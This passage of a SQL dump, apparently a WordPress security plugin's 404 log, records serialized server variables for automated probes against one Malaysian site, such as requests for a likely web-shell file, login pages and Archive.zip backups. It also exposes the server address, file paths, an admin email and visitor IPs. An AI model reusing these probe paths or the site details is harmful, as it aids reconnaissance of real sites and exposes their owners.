RI\";s:51:\"https://bintara.com.my/assets/images/wp-console.php\";s:10:\"SCRIPT_URL\";s:29:\"/assets/images/wp-console.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY3y@1mRD3dexc-X2CVsKAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569583873.8444\";s:12:\"REQUEST_TIME\";s:10:\"1569583873\";}}','notice','2019-09-27 11:31:35','2019-09-27 11:31:19',35606080,37410720,'https://bintara.com.my/assets/images/wp-console.php',1,0,'209.205.206.58'),(27137,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5F46A96E-9223-4398-AA84-EFB8A43AFEE3\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY4VygfHHZa0uwt9hsuDjQAAABc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"218.111.17.133\";s:11:\"REMOTE_PORT\";s:5:\"37477\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY4VygfHHZa0uwt9hsuDjQAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569592778.877\";s:12:\"REQUEST_TIME\";s:10:\"1569592778\";}}','notice','2019-09-27 13:59:41','2019-09-27 13:59:39',35889792,37682424,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'218.111.17.133'),(27138,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY4ZpgfHHZa0uwt9hsuFzAAAAAw\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY4ZpgfHHZa0uwt9hsuFzAAAAAw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"3.208.13.21\";s:11:\"REMOTE_PORT\";s:5:\"55385\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY4ZpgfHHZa0uwt9hsuFzAAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569593766.2933\";s:12:\"REQUEST_TIME\";s:10:\"1569593766\";}}','notice','2019-09-27 14:16:08','2019-09-27 14:16:06',35167952,36966920,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'3.208.13.21'),(27139,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY4-maTYgRwQdJ@9I7BRfQAAAIo\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY4-maTYgRwQdJ@9I7BRfQAAAIo\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"3.17.204.34\";s:11:\"REMOTE_PORT\";s:5:\"53934\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY4-maTYgRwQdJ@9I7BRfQAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569603481.3792\";s:12:\"REQUEST_TIME\";s:10:\"1569603481\";}}','notice','2019-09-27 16:58:03','2019-09-27 16:58:01',35177936,36983480,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'3.17.204.34'),(27140,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/blog/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/blog/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/blog/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqQAAARQ\";s:12:\"REDIRECT_URL\";s:17:\"/blog/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37500\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/blog/Archive.zip\";s:10:\"SCRIPT_URL\";s:17:\"/blog/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqQAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569606339.551\";s:12:\"REQUEST_TIME\";s:10:\"1569606339\";}}','notice','2019-09-27 17:45:44','2019-09-27 17:45:40',35519416,37321152,'http://bintara.com.my/blog/Archive.zip',1,0,'182.50.132.111'),(27141,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/store/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/store/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/store/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqwAAAQ4\";s:12:\"REDIRECT_URL\";s:18:\"/store/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37488\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/store/Archive.zip\";s:10:\"SCRIPT_URL\";s:18:\"/store/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqwAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606339.5433\";s:12:\"REQUEST_TIME\";s:10:\"1569606339\";}}','notice','2019-09-27 17:45:44','2019-09-27 17:45:40',35522880,37332320,'http://bintara.com.my/store/Archive.zip',1,0,'182.50.132.111'),(27142,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/dev/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/dev/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/dev/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lrAAAARE\";s:12:\"REDIRECT_URL\";s:16:\"/dev/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37496\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/dev/Archive.zip\";s:10:\"SCRIPT_URL\";s:16:\"/dev/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lrAAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569606339.246\";s:12:\"REQUEST_TIME\";s:10:\"1569606339\";}}','notice','2019-09-27 17:45:44','2019-09-27 17:45:40',35517704,37318264,'http://bintara.com.my/dev/Archive.zip',1,0,'182.50.132.111'),(27143,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/2019/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/2019/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/2019/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Kwts@3O4E744khfb8AQAAABY\";s:12:\"REDIRECT_URL\";s:17:\"/2019/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37460\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/2019/Archive.zip\";s:10:\"SCRIPT_URL\";s:17:\"/2019/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Kwts@3O4E744khfb8AQAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606339.2773\";s:12:\"REQUEST_TIME\";s:10:\"1569606339\";}}','notice','2019-09-27 17:45:46','2019-09-27 17:45:40',35125544,36935624,'http://bintara.com.my/2019/Archive.zip',1,0,'182.50.132.111'),(27144,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/v1/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/v1/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/v1/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXJAAAAUQ\";s:12:\"REDIRECT_URL\";s:15:\"/v1/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37472\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/v1/Archive.zip\";s:10:\"SCRIPT_URL\";s:15:\"/v1/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXJAAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606342.5036\";s:12:\"REQUEST_TIME\";s:10:\"1569606342\";}}','notice','2019-09-27 17:45:51','2019-09-27 17:45:43',35125472,36926496,'http://bintara.com.my/v1/Archive.zip',1,0,'182.50.132.111'),(27145,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/demo/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/demo/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/demo/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lrgAAAQw\";s:12:\"REDIRECT_URL\";s:17:\"/demo/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37492\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/demo/Archive.zip\";s:10:\"SCRIPT_URL\";s:17:\"/demo/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lrgAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606342.5036\";s:12:\"REQUEST_TIME\";s:10: